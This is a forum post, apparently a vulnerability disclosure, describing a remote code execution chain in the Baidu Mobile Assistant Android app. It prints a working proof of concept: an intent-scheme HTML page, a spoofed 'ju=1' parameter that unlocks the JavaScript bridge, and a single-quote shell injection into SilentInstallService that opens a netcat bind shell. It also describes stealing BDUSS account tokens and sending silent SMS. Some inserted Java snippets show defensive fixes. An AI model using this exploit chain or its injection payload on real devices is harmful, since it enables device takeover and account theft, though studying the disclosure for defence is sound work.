HanDs
Administrator

[July vulnerability disclosure] Baidu Mobile Assistant remote code execution vulnerability

A vulnerability in Baidu Mobile Assistant allows arbitrary code execution and retrieval of the user's BDUSS and other account data.

Details:

Baidu Mobile Assistant has an exported component that can start a private component, and through it the interface exposed in that component's WebView can be invoked.

EmptyActivity

Setting the extraction extra to goto_page and the type inside jump_config to 4 starts CommonWebViewActivity and loads the URL given in the intent.

Code:
intent://#Intent;S.extraction=goto_page;S.jump_config={"jump":{"type":4,"url":"**.**.**.**/baidudemo.html?ju=1","title":"title","fParam":"","filter_type":1}};SEL;component=com.baidu.appsearch/com.baidu.appsearch.EmptyActivity;end

CommonWebViewActivity's AppSearchWebView registers an appclient interface through addJavascriptInterface.

The interface exposes the following methods:

Code:
@JavascriptInterface public boolean addCalendarRemind(String arg12) {
@JavascriptInterface @Deprecated public boolean addReminder(String arg11, long arg12, long arg14,
@JavascriptInterface public void addShortcut(String arg7, String arg8, String arg9) {
@JavascriptInterface public void appCallbackRegister(String arg3, String arg4, String arg5) {
@JavascriptInterface public boolean callTel(String arg6) {
@JavascriptInterface public void cancelDetectGyroscopeSensor() {
@JavascriptInterface public void cancelDownload(String arg10) {
@JavascriptInterface public void cancelVoiceLevel() {
@JavascriptInterface public boolean checkCreateShortcut() {
@JavascriptInterface public void copy(String arg4) {
@JavascriptInterface public void deleteShortcut(String arg4) {
@JavascriptInterface public void detectGyroscopeSensor(String arg5) {
@JavascriptInterface public boolean detectVoiceLevel(String arg7) {
@JavascriptInterface public long downloadApp(String arg12, String arg13) {
@JavascriptInterface public long downloadFile(String arg7, String arg8) {
@JavascriptInterface public void finishActivity() {
@JavascriptInterface public String getAccountInfo() {
@JavascriptInterface public String getAppInfo(String arg3, int arg4) {
@JavascriptInterface public String getAppState(String arg5) {
@JavascriptInterface @Deprecated public int getLoginState() {
@SuppressLint(value={"ServiceCast"}) @JavascriptInterface public int getMaxVolume(int arg3) {
@JavascriptInterface public int getUserRightState() {
@SuppressLint(value={"ServiceCast"}) @JavascriptInterface public int getVolume(int arg3) {
@JavascriptInterface @Deprecated public void gotoActivity(String arg6) {
@JavascriptInterface public void installApp(String arg2) {
@JavascriptInterface public boolean isAndroidEmulator() {
@JavascriptInterface public boolean isSupportGyroscopeSensor() {
@JavascriptInterface public void launchApp(String arg2) {
@JavascriptInterface public String linkTo(String arg3) {
@JavascriptInterface public void logout() {
@JavascriptInterface public boolean openAlbum() {
@JavascriptInterface public boolean openCallTel(String arg5) {
@JavascriptInterface public boolean openCamera(String arg4) {
@JavascriptInterface public boolean openMap(String arg4) {
@JavascriptInterface public boolean openSendMail(String arg5, String arg6, String arg7, String arg8) {
@JavascriptInterface public boolean openSendSMS(String arg6, String arg7) {
@JavascriptInterface public void pauseAppDownload(String arg10) {
@JavascriptInterface public void preferenceChannelSign() {
@JavascriptInterface public void receiveAward(String arg3) {
@JavascriptInterface public boolean sendSMS(String arg10, String arg11) {
@JavascriptInterface @Deprecated public void setEventCallBack(String arg2, String arg3) {
@JavascriptInterface @Deprecated public void setSetting(String arg3, boolean arg4) {
@JavascriptInterface public void setShareData(String arg2) {
@JavascriptInterface public void setShareData(String arg2, String arg3) {
@JavascriptInterface public void setShareData(String arg8, String arg9, int arg10) {
@JavascriptInterface public void setUserRightEnable(String arg2) {
@SuppressLint(value={"ServiceCast"}) @JavascriptInterface public boolean setVolume(int arg4, int
@JavascriptInterface public void showGuidePopup(String arg2) {
@JavascriptInterface public void showTitleBarShare(boolean arg3, String arg4) {
@JavascriptInterface public void softFavorites(String arg5) {
@JavascriptInterface public void softRegister(String arg5, String arg6) {
@JavascriptInterface public boolean startActivityIntent(String arg4) {
@JavascriptInterface public boolean startBroadcastIntent(String arg4) {
@JavascriptInterface public boolean startServiceIntent(String arg4) {
@JavascriptInterface @Deprecated public void toLogin() {
@JavascriptInterface public void toLogin(String arg3) {
@JavascriptInterface public long udpateApp(String arg3) {
@JavascriptInterface public void uninstallApp(String arg2) {
@JavascriptInterface public long updateApp(String arg9) {

Most of the interface's methods only proceed when isOutUser() returns false, as in startServiceIntent:

Code:
@JavascriptInterface public boolean startServiceIntent(String arg4) {
    boolean v0 = false;
    if(!this.isOutUser()) {
        try {
            // arg4 comes straight from page JavaScript and is parsed as an intent URI
            this.mContext.startService(Intent.parseUri(arg4, 0));
            v0 = true;
        }
        catch(Exception v1) {
        }
    }

    return v0;
}

Reading the code shows that setting the URL's ju query parameter to 1 makes isOutUser() return false:

Code:
private boolean e(String arg4) {
    if(TextUtils.isEmpty(((CharSequence)arg4))) {
        boolean v0 = false;
        return v0;
    }

    String v0_1 = "http://";
    Uri v0_2 = !arg4.startsWith(v0_1) ? Uri.parse(v0_1 + arg4) : Uri.parse(arg4);
    try {
        v0_1 = v0_2.getQueryParameter("ju");
    }
    catch(Exception v0_3) {
        return false;
    }

    // the page's own query string decides whether it is treated as an "outside" user
    return !TextUtils.isEmpty(((CharSequence)v0_1)) && (v0_1.equals("1")) ? false : true;
}
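The check above trusts a page because its own URL carries ju=1, which any page can add. An origin-based version, added here as an illustration and not Baidu's code (the host names are constructed placeholders), ties the bridge to something the page cannot choose for itself:

```java
import android.net.Uri;
import android.text.TextUtils;
import android.webkit.WebView;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Added example (not the app's code): gate the privileged appclient bridge on the page origin.
// The hosts below are constructed placeholders; a real app lists its own first-party hosts.
final class BridgePolicy {
    private static final Set<String> TRUSTED_HOSTS = new HashSet<>(Arrays.asList(
            "assistant.example.invalid", "www.example.invalid"));

    /** True when the page must be treated as external. Query parameters such as ju=1 play no role. */
    static boolean isOutUser(String url) {
        if (TextUtils.isEmpty(url)) return true;               // no origin at all: deny
        Uri uri = Uri.parse(url);
        if (!"https".equals(uri.getScheme())) return true;      // plain http can be rewritten in transit
        String host = uri.getHost();
        if (host == null) return true;
        // Exact match only: a suffix check would also accept an attacker's "evil-example.invalid".
        return !TRUSTED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    /** Register appclient only for trusted pages, so an external page never sees the bridge at all;
     *  the per-call isOutUser() check then becomes defence in depth rather than the only gate. */
    static void configureBridge(WebView webView, String url, Object appClient) {
        webView.removeJavascriptInterface("appclient");          // standard WebView API, API level 11+
        if (!isOutUser(url)) {
            webView.addJavascriptInterface(appClient, "appclient");
        }
    }
}
```

Because a loaded page can navigate or redirect elsewhere, the same decision also belongs in a WebViewClient hook such as onPageStarted, re-evaluated for every new URL.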

@JavascriptInterface public boolean startActivityIntent(String arg4)

@JavascriptInterface public boolean startBroadcastIntent(String arg4)

@JavascriptInterface public boolean startServiceIntent(String arg4)

The three methods above can start an activity, start a service, and send a broadcast.

SilentInstallService and SilentUninstallService can silently install and uninstall apps.

When it does not have root, Baidu Mobile Assistant asks for root; once root has been granted, the operation runs silently.

When SilentInstallService starts, it extracts the data from the intent and wraps it in an InstallTask:

Code:
class InstallTask {
    private String a;   // APK file path
    private String b;   // app key
    private String c;   // app name

    public InstallTask(Intent arg2) {
        super();
        this.a = arg2.getStringExtra("com.baidu.appsearch.extra.APKFILEPATH");
        this.b = arg2.getStringExtra("com.baidu.appsearch.extra.APPKEY");
        this.c = arg2.getStringExtra("com.baidu.appsearch.extra.APPNAME");
    }

    static String a(InstallTask arg1) {
        return arg1.a;
    }

    static String b(InstallTask arg1) {
        return arg1.b;
    }

    static String c(InstallTask arg1) {
        return arg1.c;
    }
}



It then calls InstallTask.a() to obtain the APK file path (v0_1) and runs pm install to install the APK:

Code:
v10 = new DataOutputStream(v7);
v10.writeBytes("export LD_LIBRARY_PATH=/vendor/lib:/system/lib\n");
v10.flush();
// v0_1 is spliced between single quotes straight into the shell command line
v10.write(("pm install -r \'" + v0_1 + "\'\n").getBytes("utf-8"));
v10.flush();
v10.writeBytes("exit\n");
v10.flush();
v0_6 = v5.waitFor();



The code above shows that simply closing the surrounding single quotes allows arbitrary commands to be injected; the following runs busybox nc -ll -p 6666 -e /system/bin/sh:

code 区域
intent:#Intent;package=com.baidu.appsearch;component=com.baidu.appsearch/com.baidu.appsearch.SilentInstallService;S.com.baidu.appsearch.extra.APKFILEPATH=/data/data/com.baidu.appsearch/app_greedyporter/com.baidu.yuedu.apk' && busybox nc -ll -p 6666 -e '/system/bin/sh;S.com.baidu.appsearch.extra.APPNAME=com.demo;S.com.baidu.appsearch.extra.APPKEY=com.demo;end
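Added example (not the app's code) of how the install path could be vetted before it ever reaches pm install; allowedDir is an assumed app-private staging directory. The allowlist rejects the quote and && characters used above outright, the canonical-path check stops ../ and symlink escapes, and shellQuote shows correct quoting for the case where a shell pipe like the one above has to be kept:

```java
import java.io.File;
import java.io.IOException;
import java.util.regex.Pattern;

// Added example (not the app's code): vet the APK path and never splice it into a shell
// string unescaped. allowedDir is an assumed app-private staging directory.
final class InstallGuard {
    // Strict allowlist: only these characters, must end in .apk. Rejects quotes, spaces,
    // '&', ';', '|' and every other shell metacharacter before any further processing.
    private static final Pattern SAFE_PATH = Pattern.compile("^/[A-Za-z0-9._/-]+\\.apk$");

    /** Returns the canonical path, or throws if it is not a regular .apk file inside allowedDir. */
    static String vetApkPath(String requested, File allowedDir) throws IOException {
        if (requested == null || !SAFE_PATH.matcher(requested).matches()) {
            throw new IllegalArgumentException("APK path contains disallowed characters");
        }
        // The regex still lets ".." through, so resolve the real location before comparing.
        File apk = new File(requested).getCanonicalFile();
        String root = allowedDir.getCanonicalPath() + File.separator;
        if (!apk.getPath().startsWith(root) || !apk.isFile()) {
            throw new IllegalArgumentException("APK path is outside the staging directory");
        }
        return apk.getPath();
    }

    /** Preferred: hand pm an argv array, so no shell ever parses the path. */
    static String[] installArgv(String vettedPath) {
        return new String[] {"pm", "install", "-r", vettedPath};
    }

    /** If a shell must be driven (as the su pipe above does), quote for POSIX sh:
     *  wrap in single quotes and turn every embedded ' into '\'' so it cannot close the quote. */
    static String shellQuote(String s) {
        return "'" + s.replace("'", "'\\''") + "'";
    }
}
```

Neither helper addresses the other half of the bug, which is that SilentInstallService could be reached from page JavaScript at all; that component should only accept intents from the app itself.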

[Screenshot: Screenshot_2016-04-08-22-15-48.png]

[Screenshot: 2.png]

It can be exploited remotely through the intent URI scheme; the PoC follows:

Code:
<html>
<head>
<meta charset="utf-8" />
<title>DEMO</title>
</head>
<body>
<script>
location.href="intent://#Intent;S.extraction=goto_page;S.jump_config=%7B%22jump%22%3A%7B%22type%22%3A4%2C%22url%22%3A%22http%3A%2F%2F**.**.**.**%2Fbaidudemo.html?ju=1%22%2C%22title%22%3A%22title%22%2C%22fParam%22%3A%22%22%2C%22filter_type%22%3A1%7D%7D;SEL;component=com.baidu.appsearch/com.baidu.appsearch.EmptyActivity;end";
</script>
</body>
</html>



baidudemo.html

Code:
<h1>demo</h1>
<script>
appclient.startServiceIntent("intent:#Intent;package=com.baidu.appsearch;component=com.baidu.appsearch/com.baidu.appsearch.SilentInstallService;S.com.baidu.appsearch.extra.APKFILEPATH=/data/data/com.baidu.appsearch/app_greedyporter/com.baidu.yuedu.apk' && busybox nc -ll -p 6666 -e '/system/bin/sh;S.com.baidu.appsearch.extra.APPNAME=com.demo;S.com.baidu.appsearch.extra.APPKEY=com.demo;end");
</script>

Besides the method above, many other methods can be abused.

getAccountInfo returns user information such as the uid and BDUSS.

[Screenshot: 3.jpg]

sendSMS can be used to send text messages silently.

In versions before 7.0, downloadFile could also be used to download and install an app automatically.

Proof of vulnerability:

Demo video:

Link: http://**.**.**.**/s/1i5nkQnb   Password: 28d7

Tested version:

[Screenshot: Screenshot_2016-04-08-21-17-31.png]

Fix recommendation:


Posted: 2016-7-9   |   Views: 0   |   Replies: 0